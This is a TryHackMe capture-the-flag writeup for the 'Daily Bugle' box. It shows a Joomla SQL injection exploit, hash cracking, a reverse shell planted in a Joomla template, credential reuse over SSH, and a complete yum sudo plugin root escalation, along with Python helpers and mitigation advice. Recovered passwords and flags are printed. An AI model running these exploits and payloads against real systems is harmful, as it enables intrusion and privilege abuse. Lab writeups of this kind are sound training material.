Daily Bugle
Compromise a Joomla CMS account via SQL injection, crack password hashes, and escalate privileges using a YUM misconfiguration.
Daily Bugle - TryHackMe Writeup
Daily Bugle is a medium-difficulty Linux machine that focuses on web application security, specifically targeting Joomla CMS vulnerabilities and Linux privilege escalation techniques.
Difficulty: Medium ⭐⭐
Operating System: CentOS Linux
Themes: Web Exploitation, SQL Injection, Password Cracking, Linux Privilege Escalation
Objectives
- Identify and exploit Joomla CMS vulnerability
- Extract and crack password hashes
- Gain initial shell access
- Escalate privileges through YUM misconfiguration
- Capture user and root flags
Reconnaissance
Nmap Scan
Performed a default-script and service-version scan, skipping host discovery with `-Pn`:

```shell
nmap -sCV -Pn 10.10.172.83
```
Results:

```text
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4
80/tcp   open  http    Apache httpd 2.4.6 (CentOS) PHP/5.6.40
|_http-generator: Joomla! - Open Source Content Management
| http-robots.txt: 15 disallowed entries
|_/joomla/administrator/ /administrator/ /bin/ /cache/ ...
3306/tcp open  mysql   MariaDB 10.3.23 or earlier
```
Key Findings:
- Port 80: Joomla CMS on Apache 2.4.6 with PHP 5.6.40 (both end-of-life); this is the main attack surface
- Port 3306: MariaDB exposed to the network. It backs Joomla, but the SQL injection below goes through the web application, not through this port
- robots.txt: discloses the administrator login path and other sensitive directories
Web Enumeration
The site is a Spider-Man themed "Daily Bugle" newspaper. The Joomla administrator login panel is reachable at /administrator/, one of the paths disclosed by robots.txt.
Version Discovery
Used dirsearch to find hidden files:

```shell
dirsearch -u http://10.10.172.83
```

Found README.txt, which identifies the install as Joomla 3.7.0 (administrator/manifests/files/joomla.xml, when readable, also states the exact version).
Vulnerability Identified: Joomla 3.7.0 is vulnerable to an unauthenticated SQL injection in the com_fields component (CVE-2017-8917), fixed in 3.7.1.
Initial Access
SQL Injection Exploitation
Used the Joomla SQL injection exploit script:

```shell
git clone https://github.com/stefanlucas/Exploit-Joomla.git
cd Exploit-Joomla
python3 JoomlaExploit.py http://10.10.172.83
```

Output:

```text
Found table: fb9j5_users
Extracting users from fb9j5_users
Found user ['811', 'Super User', 'jonah', 'jonah@tryhackme.com', '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', '', '']
```
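The bug class behind CVE-2017-8917 is a sort-order value taken straight from the request: an ORDER BY clause cannot take a bound parameter, so the value ends up concatenated into the query and any SQL expression the caller writes is evaluated as the sort key. The script below is an added example for this writeup, not the exploit script above and not Joomla code. It builds an in-memory SQLite database with constructed sample tables (the table names mirror the exploit output and the stored hash is the one recovered there; the column layout and the fb9j5_fields rows are assumptions), shows the vulnerable query next to the allowlisted fix, and recovers the hash character by character through a boolean-based blind oracle built from nothing but the sort order.

```python
import sqlite3

# Constructed sample data standing in for the Joomla tables the exploit queried.
# The table names mirror the exploit output; the hash is the one recovered there;
# the column layout and the fb9j5_fields rows are assumptions for this example.
JONAH_HASH = "$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm"
# Alphabet of a bcrypt string: "./", digits, letters, plus the "$" separators.
HASH_CHARSET = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz$"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE fb9j5_users (id INTEGER, name TEXT, username TEXT, password TEXT)")
    conn.execute("INSERT INTO fb9j5_users VALUES (811, 'Super User', 'jonah', ?)", (JONAH_HASH,))
    conn.execute("CREATE TABLE fb9j5_fields (id INTEGER, title TEXT)")
    conn.executemany("INSERT INTO fb9j5_fields VALUES (?, ?)",
                     [(1, "byline"), (2, "section"), (3, "photo credit")])
    return conn


def list_fields_vulnerable(conn, ordering):
    """The bug class: the sort expression comes straight from the request.
    ORDER BY cannot take a bound parameter, so it gets concatenated, and any
    SQL expression the caller writes is evaluated as the sort key."""
    return conn.execute("SELECT id, title FROM fb9j5_fields ORDER BY " + ordering).fetchall()


# Fix: the request value is only a key into an allowlist of fixed clauses.
ALLOWED_ORDERING = {
    "id ASC": "id ASC", "id DESC": "id DESC",
    "title ASC": "title ASC", "title DESC": "title DESC",
}


def is_allowed_ordering(ordering):
    return ordering in ALLOWED_ORDERING


def list_fields_hardened(conn, ordering):
    if not is_allowed_ordering(ordering):
        raise ValueError(f"unsupported ordering: {ordering!r}")
    clause = ALLOWED_ORDERING[ordering]
    return conn.execute("SELECT id, title FROM fb9j5_fields ORDER BY " + clause).fetchall()


def oracle(conn, condition):
    """Boolean-based blind oracle built from the sort order alone:
    a true condition sorts ids ascending, a false one descending."""
    rows = list_fields_vulnerable(conn, f"(CASE WHEN ({condition}) THEN id ELSE -id END)")
    return rows[0][0] < rows[-1][0]


def extract_string(conn, subquery, max_len=80):
    """Recover the result of a scalar subquery one character at a time."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in HASH_CHARSET:
            if oracle(conn, f"substr(({subquery}), {pos}, 1) = '{ch}'"):
                recovered += ch
                break
        else:
            break  # no character matched: the string has ended
    return recovered


if __name__ == "__main__":
    db = make_db()
    print(extract_string(db, "SELECT password FROM fb9j5_users WHERE username = 'jonah'"))
    print(list_fields_hardened(db, "title DESC"))
    print(is_allowed_ordering("(CASE WHEN (1=1) THEN id ELSE -id END)"))
```

Everything runs against the local SQLite database; nothing touches a target. The oracle only needs a listing with two rows whose relative order flips with the condition, which is why an ORDER BY injection is fully exploitable even when no query output is ever echoed back. With the hardened function any sort value that is not an allowlist key is rejected before a query is built, so the CASE payload never reaches the database.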
Password Cracking
The hash is bcrypt (`$2y$` prefix, cost factor 10), which John detects automatically (hashcat mode 3200 does the same job). Save it in single quotes so the shell does not expand the `$` characters:

```shell
echo '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm' > hash.txt
```

Crack with JohnTheRipper:

```shell
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
```

Credentials Found:
- Username: jonah
- Password: spiderman123
Joomla Admin Access
Logged into the Joomla admin panel (/administrator/) as jonah with the cracked password.
Reverse Shell Deployment
- Navigate to the template editor: Extensions → Templates → Templates → Protostar Details and Files
- Edit index.php: replace its contents with the PentestMonkey PHP reverse shell, with the IP and port set to the attacking host
- Start a listener:

```shell
nc -nlvp 9999
```

- Trigger the shell: load the homepage, which renders the modified Protostar template and executes the shell as the web server user

Shell Obtained:

```text
uid=48(apache) gid=48(apache) groups=48(apache)
```
Credential Discovery
Joomla keeps its database credentials in configuration.php in the web root, readable by the apache user:

```shell
cat /var/www/html/configuration.php
```

Extracted Credentials:

```php
public $user = 'root';
public $password = 'nv5uz9r3ZEDzVjNu';
public $db = 'joomla';
```
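Pulling the properties out of configuration.php by hand is fine once; on an engagement with several Joomla hosts it is worth a parser. The following is an added example for this writeup, not Joomla code: it handles the `public $name = value;` lines of a JConfig class, including single- and double-quoted strings with escaped quotes and bare values, and assembles a mysql client invocation that keeps the password out of the process list. The sample file is constructed around the three values recovered above; the host, prefix and secret lines are assumptions.

```python
import re

# Constructed configuration.php fragment modelled on the values recovered above.
# The host, dbprefix, secret and offline lines are assumptions; a real file has many more.
SAMPLE_CONFIG = r"""<?php
class JConfig {
    public $dbtype = 'mysqli';
    public $host = 'localhost';
    public $user = 'root';
    public $password = 'nv5uz9r3ZEDzVjNu';
    public $db = 'joomla';
    public $dbprefix = 'fb9j5_';
    public $secret = "abc\"def";
    public $offline = false;
}
"""

# One property per match: name, then exactly one of single-quoted / double-quoted / bare value.
PROP_RE = re.compile(
    r'''public\s+\$(\w+)\s*=\s*(?:'((?:[^'\\]|\\.)*)'|"((?:[^"\\]|\\.)*)"|([^;]+))\s*;'''
)


def parse_joomla_config(text):
    """Return {property: value} for every `public $x = ...;` in a Joomla configuration.php."""
    props = {}
    for m in PROP_RE.finditer(text):
        name, single, double, bare = m.groups()
        if single is not None:
            # PHP single-quoted strings only recognise \' and \\ as escapes
            value = re.sub(r"\\(['\\])", r"\1", single)
        elif double is not None:
            # assumption: only \" and \\ are unescaped here; \n and friends are left as-is
            value = re.sub(r'\\(["\\])', r"\1", double)
        else:
            value = bare.strip()
        props[name] = value
    return props


def db_credentials(props):
    """The subset needed to reach the backing database."""
    return {k: props.get(k) for k in ("host", "user", "password", "db", "dbprefix")}


def mysql_client_invocation(props):
    """argv plus environment for the mysql client. The password goes in MYSQL_PWD rather
    than on the command line, so it does not show up in `ps` for other users."""
    argv = ["mysql", "-h", props.get("host", "localhost"), "-u", props["user"], props["db"]]
    env = {"MYSQL_PWD": props["password"]}
    return argv, env


if __name__ == "__main__":
    cfg = parse_joomla_config(SAMPLE_CONFIG)
    print(db_credentials(cfg))
    print(mysql_client_invocation(cfg))
```

The parsed password is also the value to try against every local account (and every other service the host talks to): on this box it turned out to be jjameson's login, which is what the next section uses.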
SSH Access
The database root password had been reused for the local account jjameson, which gave SSH access:

```shell
ssh jjameson@10.10.172.83
```

Password: nv5uz9r3ZEDzVjNu

User Shell Obtained:

```text
[jjameson@dailybugle ~]$ whoami
jjameson
```
Privilege Escalation
Sudo Privilege Enumeration

```shell
sudo -l
```

Output:

```text
User jjameson may run the following commands on dailybugle:
    (ALL) NOPASSWD: /usr/bin/yum
```
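Reading `sudo -l` output is the step people skim. As an added example for this writeup (not part of the original, and not a GTFOBins tool), the parser below turns the rule lines into one record per command, marks NOPASSWD rules, and ranks them against a small, assumed sample of binaries for which GTFOBins documents a sudo shell escape. The sample output is constructed: the yum rule is the one from this box, the other rules are made up to exercise comma-separated commands, an explicit run-as user and a rule that still prompts for a password.

```python
import os
import re

# Constructed `sudo -l` output. The yum rule is the one found on this box; the other
# rules are made up to exercise comma-separated commands, an explicit run-as user and
# a rule that still requires a password.
SAMPLE_SUDO_L = """\
Matching Defaults entries for jjameson on dailybugle:
    !visiblepw, always_set_home, match_group_by_gid, env_reset

User jjameson may run the following commands on dailybugle:
    (ALL) NOPASSWD: /usr/bin/yum
    (root) /usr/bin/vim, /bin/less
    (ALL) PASSWD: /usr/bin/systemctl restart httpd
"""

# Binaries for which GTFOBins documents a sudo shell escape. A sample, not the full list.
SHELL_ESCAPE_BINARIES = {
    "yum", "vim", "vi", "less", "more", "find", "awk", "python", "python3",
    "perl", "env", "bash", "sh", "tar", "zip", "ftp", "nmap",
}

# "(runas) TAG: TAG: command, command"  -- tags such as NOPASSWD:/SETENV: are optional
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>\S.*)$")


def parse_sudo_l(text):
    """Parse the rule lines of `sudo -l` into one dict per command."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        tags = {t.rstrip(":") for t in m.group("tags").split()}
        for cmd in m.group("cmds").split(", "):
            cmd = cmd.strip()
            rules.append({
                "runas": m.group("runas").strip(),
                "nopasswd": "NOPASSWD" in tags,
                "command": cmd,
                "binary": os.path.basename(cmd.split()[0]),
            })
    return rules


def triage(rules):
    """Return (command, runas, reasons) for every rule worth a look, most direct path first."""
    findings = []
    for r in rules:
        reasons = []
        if r["binary"] in SHELL_ESCAPE_BINARIES:
            reasons.append("GTFOBins sudo shell escape")
        if r["nopasswd"]:
            reasons.append("no password required")
        if reasons:
            findings.append((r["command"], r["runas"], "; ".join(reasons)))
    # a rule that is both an escape and NOPASSWD sorts ahead of rules with one reason
    findings.sort(key=lambda f: -f[2].count(";"))
    return findings


if __name__ == "__main__":
    for command, runas, reasons in triage(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"{command:40} as {runas:6} {reasons}")
```

On the real box the only rule is the yum one, and it lands at the top of the list for both reasons at once. The same parser is useful from the defensive side: run it over `sudo -l -U <user>` for every account during a sudoers review.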
YUM Privilege Escalation
Referenced GTFOBins (yum) for exploitation methods. yum is dangerous under sudo because `-c` lets the caller supply the configuration file, and that configuration can point yum at a plugin directory the caller controls; plugins are Python modules that yum imports and runs as root.
Method 1: RPM package creation (failed - fpm not installed)
Method 2: YUM plugin exploitation (successful):

```shell
# Create a temporary directory to hold the config and the plugin
TF=$(mktemp -d)

# yum configuration: enable plugins and load them (and their .conf files) from $TF
cat >$TF/x<<EOF
[main]
plugins=1
pluginpath=$TF
pluginconfpath=$TF
EOF

# Plugin configuration: enable the plugin named "y"
cat >$TF/y.conf<<EOF
[main]
enabled=1
EOF

# The plugin itself: yum imports it as root and calls init_hook, which replaces the process with a shell
cat >$TF/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
  os.execl('/bin/sh','/bin/sh')
EOF

# Run yum as root with the attacker-supplied config and the plugin enabled
sudo yum -c $TF/x --enableplugin=y
```
Root Access Obtained:

```text
sh-4.2# whoami
root
```
Flag Capture
User Flag

```shell
cat /home/jjameson/user.txt
```

Flag: 27a260fe3cba712cfdedb1c86d80442e

Root Flag

```shell
cat /root/root.txt
```

Flag: eec3d53292b1821868266858d7fa6f79
Key Takeaways
Attack Path Summary:

```text
Port Scanning → Joomla Discovery → Version Identification →
SQL Injection → Hash Extraction → Password Cracking →
Joomla Admin Access → Reverse Shell → Credential Discovery →
SSH Access → Sudo Enumeration → YUM Exploitation → Root Access
```
Vulnerabilities Exploited:
- CVE-2017-8917 - unauthenticated SQL injection in Joomla 3.7.0 (com_fields)
- Weak Password - bcrypt at cost 10 is slow to crack, but spiderman123 is in rockyou.txt, so the cost factor did not help
- Credential Reuse - the database root password was also the SSH password for jjameson
- YUM Misconfiguration - a NOPASSWD sudo rule for yum, which loads caller-supplied Python plugins as root
Mitigation Strategies:
- For Joomla Security:
  - Regular updates and patching (3.7.1 fixed CVE-2017-8917)
  - Strong password policies, plus two-factor authentication on the administrator login
  - Parameterised queries, and an allowlist for values such as sort columns that cannot be parameterised
  - Regular security audits
- For Linux Security:
  - Principle of least privilege for sudo access: no package managers, editors or interpreters via sudo, and no NOPASSWD rules for them
  - Regular review of sudo permissions against GTFOBins
  - Secure credential storage: configuration.php readable only by the web server user
  - Application whitelisting
- For Database Security:
  - Unique passwords per service: the database password must never double as a login password
  - A dedicated, least-privilege database user for Joomla instead of root
  - Regular password rotation
  - Database encryption
  - Restricted network access: bind MariaDB to localhost rather than exposing 3306
Tools Used:
- Nmap - Network reconnaissance
- Dirsearch - Web directory enumeration
- Exploit-Joomla - SQL injection exploitation
- JohnTheRipper - Password cracking
- GTFOBins - Privilege escalation reference
- Netcat - Reverse shell handling
Find me online:
• TryHackMe: t4t4r1s
• LinkedIn: Mustafa Altayeb
• X: @mustafa_altayeb